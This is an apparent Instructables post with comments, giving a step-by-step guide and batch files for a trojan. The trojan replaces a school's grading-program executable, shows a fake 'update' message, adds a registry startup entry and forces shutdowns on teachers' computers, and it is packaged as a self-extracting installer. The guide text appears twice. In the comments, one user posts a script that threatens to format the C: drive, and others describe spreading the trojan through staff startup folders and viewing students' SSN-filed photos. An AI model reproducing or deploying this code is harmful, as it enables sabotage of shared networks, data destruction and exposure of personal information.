Shutdown your whole school
Do not attempt what I am about to show you. This is a small virus that can be written in notepad and takes almost no effort, but can have devastating effects. I am not responsible for what you do with this information and by reading this you agree that any and all damage caused by use of this program is entirely your fault and is not my responsibility. If you are still reading this, then let's begin. First of all, most schools use a grading program. Teachers type your grade in it and it does all the work for them. This is always stored on a server. In some cases students can easily access this drive. In my school, the grading program is STI, but this method can be used on any program. Since the STI server is attached to all of the computers, it will also be able effect all of them. This is a small virus that uses STI to replicate itself and effect any teacher using STI with the virus. This virus camouflages itself by claiming to be updating STI. It doesn't work immediately however, it only works after the system has been turned off. Which most teachers do at the end of the day. So the effects of the virus will not be evident until the following morning when the computers have been rebooted. Upon startup the infected computer will display a message saying you have been hacked and give the user ten seconds before it shut the system down. So basically, the computer is now useless. This is easily fixed however, but most people don't know how. That is why I will also give you the code to fix the computers.
Here is the code for the main virus.
@echo off
shutdown.exe -s -t 10 -c "You have been hacked!"
Save this as your shutdown.bat
Here is the code for the installer. This just simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe
?=O
$=sti\ssts2
!=sti
@echo off
cd C:\
move ?:\$\!.exe
ren C:?.exe real.exe
ren C:virus.exe !.exe
cd ?:\$
move C:\!.exe
move C:\shutdown.bat
move C:\Update.reg
exit
Save this as global.bat
Now you need a program that will do the actual infecting of the computers. This displays text saying that it is updating the grading program. Just replace the word STI with the name of the grading program used in your school. Also replace ?,$, and ! as specified in the last step. This what what you need to type:
@echo off
cd C:\WINDOWS
Echo STI must update itself, this will only take a few seconds.
pause
Echo Please wait while the files install.
move ?:\$\shutdown.bat
move ?:\$\Update.reg
Echo Adding information to registry.
pause
start regedit.exe Update.reg
cd ?:\$
start real.exe
exit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one. : Template virus
Now to make it load on startup
Download this file: Registry Updater
Now we need to make a program that will install all the files used in this process. I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it.
You are all done. Thanks for reading, and remember: "With great power comes great responsibility." So use this program wisely, and by wisely I mean not at all.
But if you do, make sure to use this to remove the virus.
@echo off
shutdown -a
cd C:\WINDOWS
del shutdown.bat
save this as cure.bat and make an SFX installer that installs it to C:\WINDOWS
and make an SFX installer that installs it to C:\WINDOWS
The virus is already set to detect the cure and use it.
Just put the installer on a jump drive and run during the ten seconds it gives you before shutdown. Then let it shutdown. After that, reboot it again and the cure will stop the shutdown and remove the virus from the affected computer.
Then to prevent future breakouts of the virus. Run this batch file. Replace ?,$, and ! just as you have before.
@echo off
cd ?:\$
del !.exe
cd C:\
move ?:\$\real.exe
ren C:\real.exe !.exe
cd ?:\$
move C:\?.exe
exit
Okay, thats all.... See ya later!
Here is the code for the main virus.
@echo off
shutdown.exe -s -t 10 -c "You have been hacked!"
Save this as your shutdown.bat
Here is the code for the installer. This just simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe
?=O
$=sti\ssts2
!=sti
@echo off
cd C:\
move ?:\$\!.exe
ren C:?.exe real.exe
ren C:virus.exe !.exe
cd ?:\$
move C:\!.exe
move C:\shutdown.bat
move C:\Update.reg
exit
Save this as global.bat
Now you need a program that will do the actual infecting of the computers. This displays text saying that it is updating the grading program. Just replace the word STI with the name of the grading program used in your school. Also replace ?,$, and ! as specified in the last step. This what what you need to type:
@echo off
cd C:\WINDOWS
Echo STI must update itself, this will only take a few seconds.
pause
Echo Please wait while the files install.
move ?:\$\shutdown.bat
move ?:\$\Update.reg
Echo Adding information to registry.
pause
start regedit.exe Update.reg
cd ?:\$
start real.exe
exit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one. : Template virus
Now to make it load on startup
Download this file: Registry Updater
Now we need to make a program that will install all the files used in this process. I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it.
You are all done. Thanks for reading, and remember: "With great power comes great responsibility." So use this program wisely, and by wisely I mean not at all.
But if you do, make sure to use this to remove the virus.
@echo off
shutdown -a
cd C:\WINDOWS
del shutdown.bat
save this as cure.bat and make an SFX installer that installs it to C:\WINDOWS
and make an SFX installer that installs it to C:\WINDOWS
The virus is already set to detect the cure and use it.
Just put the installer on a jump drive and run during the ten seconds it gives you before shutdown. Then let it shutdown. After that, reboot it again and the cure will stop the shutdown and remove the virus from the affected computer.
Then to prevent future breakouts of the virus. Run this batch file. Replace ?,$, and ! just as you have before.
@echo off
cd ?:\$
del !.exe
cd C:\
move ?:\$\real.exe
ren C:\real.exe !.exe
cd ?:\$
move C:\?.exe
exit
Okay, thats all.... See ya later!
68
comments
|
Add Comment
|
sort by:
active |
newest |
oldest
Jan 19, 2011. 1:25 PMmatt_and_nick
says:
cool. i put the message as "the superintednent can suck it", since evrything is blocked by order of the superintendent.
Sep 29, 2010. 12:47 AMblacklistspy
says:
i think .its a batchFILE.........................!!!!
well i guess
use it
@echo off
DISKCOPY C:
msg * ive copied allyour c drive
msg * i will delete it unless you answer this correctly
echo Does Michael Phelps Swim?
set /p choice=
If %choice%==yes GOTO :Sorry
If %choice%==no GOTO :Hell
:Sorry
FORMAT C:
msg * Congratz.. youve lost all data on c drive!
PAUSE
exit
:Hell
msg * Yourre right!
msg * He beats the water until it takes him where he wants to go. ha ha!
:Netspam
dont learn to hack ...,,,,,, hack learns to you
well i guess
use it
@echo off
DISKCOPY C:
msg * ive copied allyour c drive
msg * i will delete it unless you answer this correctly
echo Does Michael Phelps Swim?
set /p choice=
If %choice%==yes GOTO :Sorry
If %choice%==no GOTO :Hell
:Sorry
FORMAT C:
msg * Congratz.. youve lost all data on c drive!
PAUSE
exit
:Hell
msg * Yourre right!
msg * He beats the water until it takes him where he wants to go. ha ha!
:Netspam
dont learn to hack ...,,,,,, hack learns to you
sigh... My school (sadly) has a BRILLIANT IT manager, is running Macs, and only has one PC lab. So my school is hard to crack. And to make it worse our IT manger has tracking software on every machine...(This is why i carry linux on a pin drive!) I can just see the IT guy sitting at his desk reading my assignments and snickering. But on the sunny side we have a second IT guy coming in. Maybe he'll be less brilliant.
BTY, mutant what distro of linux are you running on your web server?
BTY, mutant what distro of linux are you running on your web server?
Dec 20, 2008. 1:43 AMiRule
says:
my school is easy.. instad of all that i just go to the school loacal wich i found .. long story .. then i have lots of folders .. after i go through a 1 of them i get 'staff' and 'students' in both them folders is a startup folder so i could just paste this into staff one then every staff in school that trys to logon gets shutdown .. lol
Dec 6, 2008. 7:16 AMeichermacher
says:
my school has some pretty nasty anti-virus stuff, as if they got hit with a virus before
Dec 4, 2007. 6:21 AMthefirstgaruga
says:
Hey, the first step where you write you've been hacked, wouldn't it be better to leave that out since it kinda blows your cover?
Nov 20, 2007. 6:58 PMmutant (author)
says:
you rename the original program that the virus will be impersonating to real.exe. This is the REAL program. The virus runs and then opens real.exe, thus nobody ever notices the virus.
Nov 20, 2007. 7:28 PMaxelbro
says:
And why dont any of your links work!!!!????? PLEASE tell me where i can get those files!
Nov 20, 2007. 7:17 PMaxelbro
says:
so if it was sti.exe would it be that?..and my school is using a program called mentor...would it work with this program?
Nov 21, 2007. 9:22 PMmutant (author)
says:
yes, you would rename sti.exe to real.exe, that way the original program is still there.
Nov 19, 2007. 10:18 AMits a lion
says:
apparently its a file that a virus creates. doing a search brings up these two from symantec:
http://www.symantec.com/security_response/writeup.jsp?docid=2007-092105-1220-99&tabid=1
http://www.symantec.com/security_response/writeup.jsp?docid=2004-082510-2519-99&tabid=1
http://www.symantec.com/security_response/writeup.jsp?docid=2007-092105-1220-99&tabid=1
http://www.symantec.com/security_response/writeup.jsp?docid=2004-082510-2519-99&tabid=1
When I went to school, "desktop computers" did not exist. I had to hack the brains of the Admin to get anything accomplished. That was more fun anyway ;-)
Mar 6, 2007. 9:23 PMmutant (author)
says:
you are the single most annoying human being I have ever met. And I know a kid who takes three times the regular dosage of riddlin. And he still acts crazy. He has eaten out of the toilet, shoved redhots up his nose, and snorted orange soda. And still I like him more than you. Get a life besides annoying teenagers who know more about hacking than you do. Because, so far, nothing you have said is a valid point.
So, by self defining valid points as invalid, you justify your behavior. Fortunately, most school computer administrators have been trained to catch childish actions such as this long before they become a problem.
LasVegas, what is your day job? Just curious because you seem to know everything that involves electricity...
no he doesn't...he knows everything involving anything!
I wish. Not true though. There's a lot of briliant people on this site. Intelegence isn't knowing all the answers, It's knowing how to find them when you need them.
. I heard it as "It not what you know, it's what you can look up in a hurry." . The I'net is great, but I still keep my PDR, DSM, CRC Chem/Phys, unabridged dict, etc close by. Never know when I'll need to look something up when the power's out. heehee . I even have a "Chart of Dimensionless Numbers" on the wall - can't say I know what all that stuff means, but I got it if'n I need it. LOL
. I heard it as "It not what you know, it's what you can look up in a hurry."
Still you have to know that it is there to "look up". Some one asking for a "function" taken care of by a triac, will not be able to look it up very quickly, nott knowing what to look for.
I do admit though, when someone asks something like: "what does the HTA extension mean" I just shake my head. Is it REALLY that hard to type in "HTA extension" in the Google search engine? It is much faster then asking here, that is for sure.
Still you have to know that it is there to "look up". Some one asking for a "function" taken care of by a triac, will not be able to look it up very quickly, nott knowing what to look for.
I do admit though, when someone asks something like: "what does the HTA extension mean" I just shake my head. Is it REALLY that hard to type in "HTA extension" in the Google search engine? It is much faster then asking here, that is for sure.
I'm semi-retired... I used to design computer equipment and program. Nowadays, I service and tutor Macintosh computers and freelance programming.
I'm from Alabamastan, and my old sys admins would still stomp all over your tail for doing this. And Vegas has said plenty of valid points. Nothing wrong with being a script kiddy. Heck, I'm a script adult. I don't WANT to be a programmer. Every programmer I've met has frickin' HUGE bags under their eyes. That'll tell ya something.
Every programmer I've met has frickin' HUGE bags under their eyes. That'll tell ya something.
Thanks for noticing......LOL
Thanks for noticing......LOL
Just tells you how many long hours you guys spend staring at a screen full of text. Not for me, thank you. :) I just wish I had your mad programming skillz without all the work it takes to get them. So basically, I'd rather pay someone else to program for me. Which brings me to you. . .
Mar 9, 2007. 3:20 PMmutant (author)
says:
there you are mistaken. being a script kiddy is a fate worse than death. well that might be a little too extreme, but it is still pretty bad. look it up on wikipedia, then tell me how you would feel if you were called that.
Sep 25, 2007. 6:15 AMthermitekonga
says:
isthere any way to make the replicator code without all the files? I kind of need a replicator for something else
Sep 4, 2007. 1:35 PMfd93
says:
Ya some friends and i were fooling around with CP on my laptop at the end of school and we started inocently "Pinging" my school well one of the computer dudes saw this in firewall or somthing and they shut down the server and stuff
Jun 13, 2007. 2:46 PMtyleestuff
says:
Not trying to be mean, but this is extremely immature. Last year I had a friend who logged into the schools FTP and HTTP servers and downloaded all sorts of goodies on to the schools computers. It was pretty funny until one day the Computer Crime Investigation showed up at his front door. He got 10 days Out of School Suspension, and considering they called it a felony, he could have gotten much much worse. Stop trying to be "cool" or impress your friends. Honestly.
Jun 13, 2007. 3:40 PMtrebuchet03
says:
Here's the problem.... When I was in high school, I was a student IT. A few weeks before I graduated, I found a rather nasty security hole in my school county's network. I could, with no permissions and little effort, shut down any computer I wanted from where I was sitting. So, I reported it to the IT peoples at school.
Well, wouldn't you know.... I was threatened with expulsion, I was told I wouldn't be graduating etc. etc. Everything turned out okay with some quick thinking and speaking to a few key people... but my relationship with some of the faculty never recovered from that.
I don't know if they ever fixed the hole... but it doesn't matter. The only way to have prevented that would be to send anonymous letters or post how to do it just like this. When the student finds a problem... there's just no way to report it safely.
But to be honest, this is how security in the real world works (for the most part) ;)
Well, wouldn't you know.... I was threatened with expulsion, I was told I wouldn't be graduating etc. etc. Everything turned out okay with some quick thinking and speaking to a few key people... but my relationship with some of the faculty never recovered from that.
I don't know if they ever fixed the hole... but it doesn't matter. The only way to have prevented that would be to send anonymous letters or post how to do it just like this. When the student finds a problem... there's just no way to report it safely.
But to be honest, this is how security in the real world works (for the most part) ;)
Almost the same thing happened to me when i discovered a major fault in our schools student log on scripts, that if you did the right thing at the right time, you could get admin access instead. I was threatened with suspension, and I was one of the good guys.
Jun 13, 2007. 6:09 PMWeallliveintheyellowsubmarine
says:
Why would you want to close school? And if we should not do it anyway, why even bother mentioning it?
Apr 9, 2007. 5:40 PMBrennn10
says:
You also posted this as an instructable: why both? It's still not up to much either way. L
Mar 6, 2007. 3:35 PMmutant (author)
says:
also, while many people know how to abort shutdown, those people do NOT know where the main replication program is stored, thus the virus will spread all over again. But you could fix the replicator with the last batch file I included. Just letting you know.
Mar 6, 2007. 3:31 PMmutant (author)
says:
Be cautious, becuase you could end up expelled. Just a warning. Also, if you DO attempt this, please post the results. This does not mean I condone such acts, just curious of the outcome and possible success of my brain-child.
Mar 6, 2007. 8:05 PMmutant (author)
says:
Well, I just got bored one day... and the rest is history. As far as spreading another way, I can make a virus that spreads through any p2p file sharing program such as limewire or bearshare. These are actually recognized by norton as a virus.
Apr 9, 2007. 5:41 PMBrennn10
says:
Now why would you want to do that? Also, batch is soo old, pick up an easier and more recent language. VB 2005 ftw!
Apr 10, 2007. 3:54 PMmutant (author)
says:
Actually, I currently am. I have also incorporated vbs files in my bat files with the cscript command. Now I can have more powerful and flexible programs. Can you show me any good places to learn VBS
Apr 10, 2007. 3:55 PMmutant (author)
says:
Also if you know where I can learn about hta files, I would also appreciate it.
Apr 11, 2007. 5:58 AMBrennn10
says:
Download VB 2005 Here
A couple simple program tutorials
Very Good Video Tutorial
I hope these helped. I do not know where to learn about hta files.
A couple simple program tutorials
Very Good Video Tutorial
I hope these helped. I do not know where to learn about hta files.
Apr 12, 2007. 5:53 AMBrennn10
says:
Create an HTA by writing an HTML page and saving it with the .hta extension. It is that simple!
Apr 12, 2007. 3:46 PMmutant (author)
says:
(sarcastically) Oh, thank you. That was so helpful. You can also type the word hello in notepad and save it as a .exe file. But that doesn't make it perform commands, now does it? P.s. It wasn't all that funny.
May 27, 2009. 2:50 AMuberdum05
says:
I made a .exe file that said "hello" on windows XP and it gave me this error : "16 bit MS-DOS Subsystem C:\DOCUME~1\Callum\Desktop\hi.exe The NTVDM CPU has encountered an illegal instruction CS:0f52 IP:fffe OP: ff ff 00 00 00 Choose 'Close' to terminate the application." I'm assuming it's got something to do with the Instruction Pointer and the Output of it ? Could somebody tell me what it means.
Apr 12, 2007. 5:34 PMBrennn10
says:
I was just giving you all the information that I know you script kiddy.
Well said. If this guy wants help and advice, he should act graciously about it.
Mar 5, 2007. 6:23 PMtrebuchet03
says:
My high school required remote access to the grade server (which wasn't even on campus) VIA terminal. The whole interface was ascii :P We (IT peoples) had to spend a lot of time with the teachers as the interface wasn't very user friendly :P
This looks like it could work IF (and it's a big IF) if you get access to this server. Highly illegal (even posting it is iffy). But looks like it would work. Unless of course... the user has a mac :P
I was curious if this file would even save with some form of virus protection.... It did. And I was quickly asked what to do with it :P
This looks like it could work IF (and it's a big IF) if you get access to this server. Highly illegal (even posting it is iffy). But looks like it would work. Unless of course... the user has a mac :P
I was curious if this file would even save with some form of virus protection.... It did. And I was quickly asked what to do with it :P
Mar 5, 2007. 9:35 PMmutant (author)
says:
Oh, don't worry, I can easily get to this server. Every computer in the Comp. Lab has access to it. It is the O: drive. It also contains the photos for the lunch account system in JPG format. Yeah, I live in Alabama, my teachers are computarded. computer+retarded=computarted.
Our school has networked computer-type cash registers, and I was able to access them. It wasn't hard; there was a big thing saying "CAFETERIA_COMPUTER_1" at the top. It must be alphabetical or something...
Mar 5, 2007. 9:41 PMmutant (author)
says:
LOL, that isn't too obvious is it? The photos I found were also stored in order by SSN, not only can you change their photo, but you now have some of their hidden personal info. Yay for ignorant computer users, they make the computer enjoyable for the rest of us.
Mar 5, 2007. 7:30 PMmutant (author)
says:
oops, include virus in that rar file, then remake the SFX again. I gotta fix that dang mistake now.
I hate when people use age as a basis of making an accomplishment seem greater, or excusing a flaw. Don't do it. You being 14 and doing this isnt any more amazing than a 30 year old. Now if you were 5 that's another story... by the way, I'm 14 too, so you cant use any difference as an excuse for my opinion. This is the same reason i got mad at a member a while back who suggested that it displays your age next to comments. He/She insulted the instructable, then apologized after discovering the posters age. His being young didn't make it a good idea or well don't project if it wasn't while he was old..
Mar 5, 2007. 7:09 PMmutant (author)
says:
It doesn't make it any more amazing, just less creepy.
Thank you for actually posting a virus, not just
I think this might be a "Logic bomb", as it is triggered by a server reset, and doesn't duplicate itself :-)
@echo off shutdown.exe -s -t 10 -c "You have been hacked!"(I saw that and started to get afraid of another pseudo-virus.
I think this might be a "Logic bomb", as it is triggered by a server reset, and doesn't duplicate itself :-)
Mar 5, 2007. 6:15 PMmutant (author)
says:
I does duplicate itself, it copies itself from the STI drive to the teacher using it. Thus infecting multiple systems.
Yeah, but thats not really what duplication means when you speak about viruses. I mean it can't affect another server, or go from computer-to-computer. Suggestion: use VB express or something to make a little program window, using the same logo thing as STI. And we 14-year-olds are pretty damn smart :-P (And if you are really good, you are on a Linux box, and although detest windows, would use WINE to install VB express)
Mar 5, 2007. 7:10 PMmutant (author)
says:
No... I'm Windows all the way. Except my server for my web site. That's linux. Just because I want to run CGI script. But I will try your tip. And I don't want it to duplicate any more than that. That is getting a little too dangerous to mess with.
 |
Vancouver Mini Maker Faire 2012
Rebuilding NordicTrack ski machine drive rollers
Looking for New Zealand-based Instructables authors for conference on August 27 in Wellington
Call to makers - Brighton Mini Maker Faire
Milk Crates - not as green as you think
TEDxBaghdad - Iraq - violence, dust storms and open sourced manufacturing
UK Mini Maker Faire - The Derby Silk Mill - New Poster to Share!
